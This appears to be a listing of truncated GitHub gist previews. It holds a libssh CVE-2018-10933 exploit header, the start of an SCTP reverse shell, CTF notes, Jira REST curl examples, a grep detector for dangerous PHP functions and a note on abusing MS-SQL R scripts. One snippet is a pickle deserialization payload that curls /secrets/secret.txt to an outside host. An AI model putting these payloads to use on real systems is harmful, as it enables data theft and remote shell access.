This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
# -*- coding: utf-8 -*- | |
# Based on https://www.openwall.com/lists/oss-security/2018/08/16/1 | |
# and on https://www.libssh.org/security/advisories/CVE-2018-10933.txt | |
# Original exploit code https://gist.github.com/mlosapio/2062ebf943485a7289d226e0d00498e7 | |
# References | |
# https://qxf2.com/blog/ssh-using-python-paramiko/ | |
# https://github.com/SoledaD208/CVE-2018-10933 | |
# On OSX -> pip install paramiko==2.0.8 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python3 | |
# | |
# Tiny SCTP Reverse Shell inspired by http://insecurety.net/?p=765 | |
# Connect with `ncat --sctp -lvp 1234` | |
import os, socket, subprocess | |
RHOST = '127.0.0.1' | |
RPORT = 1234 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
-- challenge 1: | |
From the name of the challenge it was a dead giveway that there was a .git folder exposed. | |
Then just find out where the git repo is hosted: | |
curl http://0x70.apl3b.com/.git/config | |
And get the repo hosting service: | |
https://gitlab.com/DDuarte/twipy.git | |
Finally check all the commits and on this one at the bottom of the page you can read a flag: |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
cposix | |
system | |
p0 | |
(S'curl -d "foo=`cat /secrets/secret.txt`" http://myhost:4444' | |
p1 | |
tp2 | |
Rp3 | |
. | |
FLAG{N3v3r_Us3_P1cKl3_f0R_3xt3rN4L_0Bj3c75!} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#Creates a new issue with custom fields | |
curl -D- -u uname:pass -X POST --data "{\"fields\": {\"project\": { \"id\": \"10430\" },\"summary\": \"This is a test issue\", \"description\": \"Description\",\"issuetype\": { \"id\" : \"1\"}, \"components\" : [{\"id\":\"10731\"}], \"customfield_10711\" : [{\"id\":\"10500\"}] } }" -H "Content-Type: application/json" http://localhost:8080/jira/rest/api/2/issue/ | |
#Returns all information for all versions | |
curl -D- -u uname:pass -X PUT -d "Content-Type: application/json" http://localhost:8080/jira/rest/api/2/project/AN/versions? | |
#Returns all issues in a version | |
#This URL requires the version ID of a single version which is provided by the above query | |
curl -D- -u uname:pass -X PUT -d "Content-Type: application/json" http://localhost:8080/jira/rest/api/2/search?jql=project="AN"+AND+fixVersion='12345' |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#Creates a new issue with custom fields | |
curl -D- -u uname:pass -X POST --data "{\"fields\": {\"project\": { \"id\": \"10430\" },\"summary\": \"This is a test issue\", \"description\": \"Description\",\"issuetype\": { \"id\" : \"1\"}, \"components\" : [{\"id\":\"10731\"}], \"customfield_10711\" : [{\"id\":\"10500\"}] } }" -H "Content-Type: application/json" http://localhost:8080/jira/rest/api/2/issue/ | |
#Returns all information on an issue | |
curl -D- -u uname:pass -X PUT -d "Content-Type: application/json" http://localhost:8080/jira/rest/api/2/issue/KEY-12345 | |
#Adds a comment to an existing issue | |
curl -D- -u uname:pass -X PUT -d "{\"update\": {\"comment\": [{\"add\": {\"body\": \"Comment added when resolving issue\"}}]}}" -H "Content-Type: application/json" http://localhost:8080/jira/rest/api/2/issue/KEY-12345 | |
#Transitions an issue |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#Creates a new issue with custom fields | |
curl -D- -u uname:pass -X POST --data "{\"fields\": {\"project\": { \"id\": \"10430\" },\"summary\": \"This is a test issue\", \"description\": \"Description\",\"issuetype\": { \"id\" : \"1\"}, \"components\" : [{\"id\":\"10731\"}], \"customfield_10711\" : [{\"id\":\"10500\"}] } }" -H "Content-Type: application/json" http://localhost:8080/jira/rest/api/2/issue/ | |
#Returns all information for all versions | |
curl -D- -u uname:pass -X PUT -d "Content-Type: application/json" http://localhost:8080/jira/rest/api/2/project/AN/versions? | |
#Returns all issues in a version | |
#This URL requires the version ID of a single version which is provided by the above query | |
curl -D- -u uname:pass -X PUT -d "Content-Type: application/json" http://localhost:8080/jira/rest/api/2/search?jql=project="AN"+AND+fixVersion='12345' |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
JIRA_REST_URL="${JIRA_REST_URL:-https://MYCOMPANY.jira.com/rest/api/2}" | |
JIRA_CREDENTIALS="${JIRA_CREDENTIALS:-user:password}" | |
# https://developer.atlassian.com/jiradev/api-reference/jira-rest-apis/jira-rest-api-tutorials/jira-rest-api-example-discovering-meta-data-for-creating-issues | |
# https://MYCOMPANY.jira.com/rest/api/2/issue/createmeta?projectKeys=MYPROJ&issuetypeNames=MyIssueType&expand=projects.issuetypes.fields | |
# customfield_10171: My Custom Field Name 1 | |
# customfield_10172: My Custom Field Name 2 | |
# This methods create a new issue of type 'MyIssueType' in project 'MYPROJ' with 2 custom fields |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
P="*" | |
if [ -n "$1" ]; then | |
P="$1" | |
fi | |
grep -E "\spassthru\(|\sexec\(|\spnctl_exec\(|\sproc_open\(|\spopen\(|\ssystem\(|\sshell_exec\(|\sregister_shutdown_function\(|\sregister_tick_function\(|\seval\(|\sexpect_popen\(|\sapache_child_terminate\(|\slink\(|\sposix_kill\(|\sposix_mkfifo\(|\sposix_setpgid\(|\sposix_setsid\(|\sposix_setuid\(|\sproc_close\(|\sproc_get_status\(|\sproc_nice\(|\sproc_terminate\(|\sputenv\(|\stouch\(|\salter_ini\(|\shighlight_file\(|\sshow_source\(|\sini_alter\(|\sfgetcsv\(|\sfputcsv\(|\sfpassthru\(|\sini_get_all\(|\sopenlog\(|\ssyslog\(|\srename\(|\sparse_ini_file\(|\sftp_connect\(|\sftp_ssl_connect\(|\sfsockopen\(|\spfsockopen\(|\ssocket_bind\(|\ssocket_connect\(|\ssocket_listen\(|\ssocket_create_listen\(|\ssocket_accept\(|\ssocket_getpeername\(|\ssocket_send\(|\sapache_get_modules\(|\sapache_get_version\(|\sapache_getenc\(|\sapache_note\(|\sapache_setenv\(|\sapache_request_headers\(|\sdiskfreespace\(|\sdisk_free_space\(|\sget_current_user\(|\sgetmypid\(|\sgetmyuid\(|\s |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# original https://pastebin.com/zBDnzELT | |
Starting with MS-SQL 2016 MS has allowed for the inclusion of the Microsoft R Server services, permitting the execution of R scripts in the MS-SQL environment. In order for this funcitonality to be enabled, the R services for SQL server component must be installed, the server must be reconfigured to permit sp_exectue_external_script, and a user must be granted the 'EXECUTE ANY EXTERNAL SCRIPT' permission; yes, all of this is becoming increasingly more common. | |
Once these conditions are in place, SQL users will have R capabilities in their queries through the use of sp_execute_external_script(). | |
This can be 'fun'.. | |
Sample R query in MS-SQL (from MSDN): | |